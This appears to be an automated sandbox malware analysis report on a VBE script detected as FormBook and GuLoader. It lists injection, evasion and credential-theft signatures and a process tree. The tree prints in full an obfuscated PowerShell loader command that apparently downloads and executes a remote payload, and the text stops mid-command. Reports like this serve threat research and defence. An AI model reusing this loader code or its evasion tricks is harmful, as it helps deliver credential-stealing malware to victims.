Edit tour
Windows
Analysis Report
Narudzba ACH0036173.vbe
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6572 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Narud zba ACH003 6173.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 2504 cmdline:
cmd.exe /c ping 6777 .6777.6777 .677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 3864 cmdline:
ping 6777. 6777.6777. 677e MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 1068 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Ledigga ng Graadig hedens Dis ciplinerin ger Bagerm estrene Te utonisk Up tilt #>;$S pegeplsern e='Nymaled es';<#Mess iness Comp romising A naphalis G ennemarbej delsen Fod ervikkerne #>;$Lapar otomize140 =$host.'Pr ivateData' ;If ($Lapa rotomize14 0) {$Triko tagefabrik ker++;}fun ction Spdb arnsplejer ens($Ledni ngernes){$ Annelism=$ Totlafhold enhed61+$L edningerne s.Length-$ Trikotagef abrikker; for( $Omgi k=7;$Omgik -lt $Anne lism;$Omgi k+=8){$Met hodisers=' Exuscitate ';$Protasp is+=$Ledni ngernes[$O mgik];$New sroom204=' Dkfjers';} $Protaspis ;}function Optllings lister($ba ulky){ & ($Unark) ( $baulky);} $Steamboat ing=Spdbar nsplejeren s 'Mouthfu MDecollaoU arb,jdzRaa baaniUdf l delunderti lAntipreaN ebra.k/Ave rrab5stedb rd.Faglrer 0 Ful,vr B lottel(Por ch dWB tal iniAfgangs nRati,nedP opuliso Ov e clwAllok atsBegnawn HjertebN Kal etTTem pl r Mater ia1Haunche 0Waylanr. instit0Gri tmi;Depar te c araci W,uccubei. aftkjonand est 6Eardr o 4 Increa ; Delege F inansrx Ut erom6 myst i 4Fgtmedd ;a,reste b arramurMac roptvKonvo lu:Re ligh 1 Graph 2A rgenti1Del ubru.Apace a0Bebutto )Lystbaa u nquietG Sp elmae Twel fhcAttak e kSkamrdmoQ uantis/Per sona2Hemid om0Noggkas 1 Nonchr0, anebry0Jas zmal1Futu is0Ud lugt 1 Arquat B ararmFLike nesiQuizzy srIchthyoe LuncherfOz oniz.oRaas tofx.hefmg l/Gra,bea1 Aym sar2 F je,ne1.ong rat.Andels s0No merc ';$Railcar d=Spdbarns plejerens 'syltdepuS oapfissdkn ingsESvart idRRidning - Er,rinA PainkigOve rophE Gust inN Negati TForkerk ' ;$Ekspatri eret=Spdba rnsplejere ns 'Bille thG,ilingt ThrenodtBi bliotpNone vilsSkyder e:Evangel/ mpetu/ Fi li,tp Dato stuSpecial b Blomme-T remour2pla dshof Achi l7Nipsets d Quater0 upersu7gag ered1Vgtfo rd5 Repr.f 3,nakepreG reeneraHou sefl1ev ko st4 B.odsp 0Moduler3A nsamle1Jen gene8Sockh ea4 leopar dStengun6B ioscie2Ton ikum2U,ifi ab6Skammel 6Litigatd Ind kr9unp erv.cAfisn in2Regiona 8theodraeA ngolan4S h oolb1 Thel yt. Stavns rTeleotr2T pefli.drm mebid Cons pieMicroto vTopchef/U dlistnnTaa getmePenny spdDr gbol kRiddersoT rvlerng Kr gendeRecan .e. betaci m Kruspes DeadmeoHus ass ';$Ove rrigidness =Spdbarnsp lejerens ' Soapyre>In dsnus ';$U nark=Spdba rnsplejere ns 'Ternin gi,vergene Slank ixKa osets ';$M etaprescut um='Caddis es';$Arkiv skab='\Nat ionalsocia listernes. Ska';Optll ingslister (Spdbarns plejerens 'Uhjlpso$B epaidlgBet ali lRea i zaoDisser, bEspartoAT yr fgtlKld eren:Cebid nm ogejom e S ppreKP apembaa Ob lig.Nklini kliBankema ShaplontMo dsgnieFin landRHenns .n= N.trog $ ego,seEP lasmasn.ul tideVIlleg it:Bu.klad Apel,rgoPR akitispQui ncyuD Guid ebA antasi TThomisiAU nhands+was abis$Racia l,aN nsurg